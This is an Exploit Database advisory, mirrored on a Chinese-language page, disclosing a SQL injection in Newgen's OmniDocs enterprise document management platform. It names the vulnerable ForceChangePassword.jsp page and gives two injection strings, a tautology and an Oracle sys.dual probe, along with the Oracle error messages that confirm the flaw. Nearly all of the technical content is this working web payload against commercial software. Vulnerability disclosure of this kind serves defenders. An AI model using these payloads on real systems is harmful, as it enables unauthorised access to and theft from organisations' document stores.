Omnidocs – SQL Injection

• Exploit Database
• 45 阅读

• 作者： thebluegenius
  日期： 2010-02-11
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/11393/

• --------------------------------------------------------------------
  # Exploit Title: Omnidocs SQL injection Vulnerability
  # Date: 10 Feb 2010
  # Author: thebluegenius
  # Software Link: http://www.newgensoft.com/omnidocs.asp
  # Version: All
  # Tested on: Apache-Coyote/1.1 | JBoss
  # CVE : NA
  
  ---------------------------------------------------
  "Omnidocs" SQL injection vulnerability.
  ---------------------------------------------------
  By :Thebluegenius. 
  Email:rajsm@isac.org.in
  Blog	 :thebluegenius.com.
  ---------------------------------------------------
  
  Description:
  OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.
  
  ------------------
  Vulnerability
  ------------------
  
  Affected URL: http://server/omnidocs/ForceChangePassword.jsp
  
  Command: ' or 'a' = 'a'
  Confirmed SQL Injection error :ORA-00907: missing right parenthesis 
  
  Command: or exists (select 1 from sys.dual) and ''x''=''x'
  Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated 
  
  -----------------------------------------------------
  Greetz Fly Out to:
  1] Amforked(): My good friend
  2] Aodrulez: for inspiring me
  3] www.OrchidSeven.com
  4] www.isac.org.in